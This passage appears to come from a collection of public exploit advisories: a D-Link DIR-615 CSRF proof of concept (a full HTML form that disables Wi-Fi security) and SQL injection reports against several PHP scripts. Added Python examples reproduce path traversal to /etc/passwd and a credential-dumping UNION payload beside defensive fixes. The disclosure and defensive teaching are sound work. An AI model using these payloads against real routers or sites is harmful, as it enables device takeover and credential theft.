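Added example, not GeoMoose code. The two PoC URLs above put "foo/." in id and "/../../.../etc/passwd" in ext; if download.php builds the path as id + "." + ext (an assumption suggested by the shape of the PoC, which is why id ends in "/."), the joined string becomes "foo/../../../.../etc/passwd" and resolves outside the download directory. naive_path() reproduces that; resolve_download() is a safe replacement. The base directory, the regular expressions and the function names are constructed for this example.

```python
import os
import re

# Added example, not GeoMoose code: the traversal the PoC relies on, beside a
# resolver that confines the result to the download directory.

DOWNLOAD_DIR = "/srv/geomoose/downloads"   # hypothetical base directory

_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")    # what a file id may look like
_EXT_RE = re.compile(r"[A-Za-z0-9]{1,8}")      # what an extension may look like


def naive_path(base, file_id, ext):
    """What plain concatenation yields once the OS normalises the path.

    With id="foo/." and ext="/../../../../../../../etc/passwd" the joined
    "foo/." + "." + "/.." becomes "foo/../..", and the rest climbs to the root.
    """
    return os.path.normpath(os.path.join(base, file_id + "." + ext))


def resolve_download(base, file_id, ext):
    """Return the absolute path to serve, or None if the request is not acceptable."""
    # Layer 1: only accept the character classes an id and an extension can have.
    if not _ID_RE.fullmatch(file_id) or not _EXT_RE.fullmatch(ext):
        return None
    # Layer 2: resolve symlinks and "..", then confirm the result is still inside base.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, file_id + "." + ext))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


if __name__ == "__main__":
    poc_id, poc_ext = "foo/.", "/../../../../../../../etc/passwd"
    print(naive_path(DOWNLOAD_DIR, poc_id, poc_ext))        # /etc/passwd
    print(resolve_download(DOWNLOAD_DIR, poc_id, poc_ext))  # None
    print(resolve_download(DOWNLOAD_DIR, "map42", "pdf"))
```

Layer 1 alone already rejects both PoC inputs; layer 2 is kept because it also catches a symlink inside the download directory that points elsewhere, which no character allowlist can see.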
Title:
====
D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability
Credit:
======
Name: Pratik S. Shah
Reference:
=========
CVE Details: CVE-2017-7398.
Date:
====
1-04-2017
Vendor:
======
D-Link wireless router
Product:
=======
DIR-615
http://www.dlink.co.in/products/?pid=678
Affected Version:
=============
Hardware: T1 , Firmware: 20.09
Abstract:
=======
This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Attack Type:
===================
Remote
Details:
=========
CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device.
Proof Of Concept:
================
1) User login to D-link DIR 615 wireless router
2) User visits the attacker's malicious web page (DlinkCSRF.html)
3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None
This is the CSRF PoC for changing the security option from WPA2 to None (parameter: method).
Attacker can also tamper following parameters
hiddenSSID
SSID
Passwords for all the applicable security options
<html>
<!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09 -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="Hacked" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method_cur" value="6" />
<input type="hidden" name="method" value="0" />
<input type="hidden" name="authType" value="1" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="CSRF@test" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
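Added example, not D-Link firmware or HelpDEZK code, serving both this advisory and the HelpDEZK one above: the two server-side checks that would have stopped the form PoC here and the XMLHttpRequest PoCs there. In both cases the browser attaches the victim's cookie automatically (for XHR, withCredentials=true does the same), so the cookie alone cannot tell the user's own request from a forged one. The token derivation, the SITE_ORIGIN value (the router address used in the PoC), the field name csrf_token and the function names are choices made for this example; the form fields are taken from the PoC above.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Added example, not vendor code: synchroniser token plus origin check for a
# state-changing POST such as form2WlanBasicSetup.cgi or /admin/person/insertNatural.

SITE_ORIGIN = "http://192.168.0.1"   # origin of the router UI in the PoC above


def issue_csrf_token(server_secret, session_id):
    """Per-session token, derived with HMAC so the server need not store it.
    The page embeds it in every form; a cross-site page cannot read it."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Origin header, falling back to the Referer's scheme://host[:port]."""
    if headers.get("origin"):
        return headers["origin"]
    ref = headers.get("referer")
    if ref:
        u = urlsplit(ref)
        return "%s://%s" % (u.scheme, u.netloc)
    return None


def csrf_ok(headers, form, session_id, server_secret):
    """Return (accepted, reason) for a state-changing POST."""
    # 1. Synchroniser token: the attacker's page cannot read it, so it cannot send it.
    expected = issue_csrf_token(server_secret, session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf_token"
    # 2. Defence in depth: a browser sends Origin on cross-site POSTs, and it
    #    names the attacker's site; with neither Origin nor Referer we refuse.
    origin = request_origin(headers)
    if origin != SITE_ORIGIN:
        return False, "cross-site request from %r" % (origin,)
    return True, "ok"


# Fields from the D-Link PoC above (method 0 = security None, new SSID and PSK).
POC_FORM = {"domain": "1", "hiddenSSID": "on", "ssid": "Hacked", "method_cur": "6",
            "method": "0", "pskValue": "CSRF@test", "save": "Apply"}

if __name__ == "__main__":
    secret = b"0123456789abcdef0123456789abcdef"   # constructed server secret
    print(csrf_ok({"origin": "http://attacker.example"}, POC_FORM, "sess-42", secret))
    own = dict(POC_FORM, csrf_token=issue_csrf_token(secret, "sess-42"))
    print(csrf_ok({"origin": SITE_ORIGIN}, own, "sess-42", secret))
```

The token check is the one that matters; the origin check is cheap and catches the case where a token leaks through an unrelated bug. Note that the PoC here does not need either check to fail in order to reach the CGI: the router also has to bind the session to something the attacker's page cannot supply, which is exactly what the token is.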
Disclosure Timeline:
======================================
Vendor Notification: 6th March 2017
# # # # #
# Exploit Title: Doctors Appointment Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://appointment-script.com/
# Software: http://appointment-script.com/demo
# Demo: http://appointment-script.com/demo
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?lat=[SQL]&lon=[SQL]&category=[SQL]&insurance=[SQL]
# user
# id
# first_name
# last_name
# username
# email
# password
# user_level_id
# An unrestricted file upload is also present in the doctor profile image handler; uploaded files are stored under:
# http://localhost/[PATH]/images/doctor_image/...
# # # # #
# # # # #
# Exploit Title: Sweepstakes Pro Software - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/sweepstakes-pro-software/
# Demo: http://mysweepstakespro.com/demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/win.php?s=[SQL]
# http://localhost/[PATH]/widget_lb.php?s=[SQL]
# ss_members :id
# ss_members :name
# ss_members :email
# ss_members :country
# ss_members :their_username
# ss_members :their_password
# # # # #
# # # # #
# Exploit Title: Premium Penny Auction Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/premium-penny-auction-script/
# Demo: http://pennyauction.clonedemo.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/allauctions.php?aid=[SQL]
# http://localhost/[PATH]/news.php?nid=[SQL]
# http://localhost/[PATH]/productdetails.php?aid=[SQL]&pid=[SQL]
# admin :id
# admin :username
# admin :pass
# affiliate_transaction :aff_id
# affiliate_transaction :user_id
# affiliate_transaction :referer_id
# affiliate_transaction :amount
# affiliate_transaction :commission
# affiliate_transaction :bid_pack_title
# # # # #
# # # # #
# Exploit Title: Airbnb Crashpadder Clone Script - SQL Injection
# Google Dork: N/A
# Date: 05.04.2017
# Vendor Homepage: http://bimedia.info/
# Software: http://bimedia.info/airbnb-premium-clone-script/
# Demo: http://airbnb.clonedemo.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/page/1[SQL]
# http://localhost/[PATH]/view-rental/1/1[SQL]
# # # # #
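An added example, not code from any of the four scripts above: the injection points they list come in two shapes, a value inside a quoted string (search?category=[SQL]&insurance=[SQL], win.php?s=[SQL]) and a bare number (allauctions.php?aid=[SQL], page/1[SQL]). The sqlite3 script below builds a constructed database, shows each shape being injected when the query is assembled by string formatting, and shows the parameterised query that treats the same input as plain data. The user table mirrors the columns the Doctors Appointment Script advisory lists; the doctor and auction tables, the rows and the function names are constructed for the example.

```python
import sqlite3

# Added example, not the scripts' code: the two injection shapes the advisories
# above list, reproduced against a constructed sqlite3 database, each beside
# the parameterised query that stops it.


def make_db():
    """Constructed sample data (the user columns follow the advisory's list)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user(id INTEGER, username TEXT, email TEXT,
                          password TEXT, user_level_id INTEGER);
        INSERT INTO user VALUES (1, 'admin', 'admin@example.invalid', 'hash-of-admin', 1);
        INSERT INTO user VALUES (2, 'bob',   'bob@example.invalid',   'hash-of-bob',   2);
        CREATE TABLE doctor(id INTEGER, name TEXT, category TEXT, insurance TEXT);
        INSERT INTO doctor VALUES (1, 'Dr. Lee', 'dentist', 'acme');
        INSERT INTO doctor VALUES (2, 'Dr. Roy', 'cardio',  'acme');
        CREATE TABLE auction(aid INTEGER, title TEXT, hidden INTEGER);
        INSERT INTO auction VALUES (1, 'Public lot',   0);
        INSERT INTO auction VALUES (2, 'Unlisted lot', 1);
    """)
    return conn


# --- string context: search?category=[SQL]&insurance=[SQL], win.php?s=[SQL] ---

def search_vulnerable(conn, category, insurance):
    """Query assembled by string formatting: a quote in the input ends the literal."""
    sql = ("SELECT name FROM doctor WHERE category = '%s' AND insurance = '%s'"
           % (category, insurance))
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, category, insurance):
    """Same query with bound parameters: the input is only ever a value."""
    sql = "SELECT name FROM doctor WHERE category = ? AND insurance = ?"
    return [row[0] for row in conn.execute(sql, (category, insurance))]


# --- numeric context: allauctions.php?aid=[SQL], page/1[SQL] ---

def auction_vulnerable(conn, aid):
    """No quotes to break out of; boolean logic is appended straight into WHERE."""
    sql = "SELECT title FROM auction WHERE hidden = 0 AND aid = " + aid
    return [row[0] for row in conn.execute(sql)]


def auction_fixed(conn, aid):
    """Validate the type first, then bind; anything that is not an integer is rejected."""
    try:
        aid_int = int(aid)
    except ValueError:
        return []
    sql = "SELECT title FROM auction WHERE hidden = 0 AND aid = ?"
    return [row[0] for row in conn.execute(sql, (aid_int,))]


# Payloads: the first closes the string literal and appends a UNION that reads
# the user table; the second is the classic "1 OR 1=1" against a numeric field.
UNION_PAYLOAD = "' UNION SELECT username || ':' || password FROM user -- "
NUMERIC_PAYLOAD = "1 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, UNION_PAYLOAD, "acme"))   # leaks user credentials
    print(search_fixed(db, UNION_PAYLOAD, "acme"))        # []
    print(auction_vulnerable(db, NUMERIC_PAYLOAD))        # includes 'Unlisted lot'
    print(auction_fixed(db, NUMERIC_PAYLOAD))             # []
```

The numeric case is worth a second look: escaping quotes does nothing for it, because there are no quotes to escape. Binding the parameter after an explicit int() conversion is what makes "1 OR 1=1" a rejected value rather than a WHERE clause.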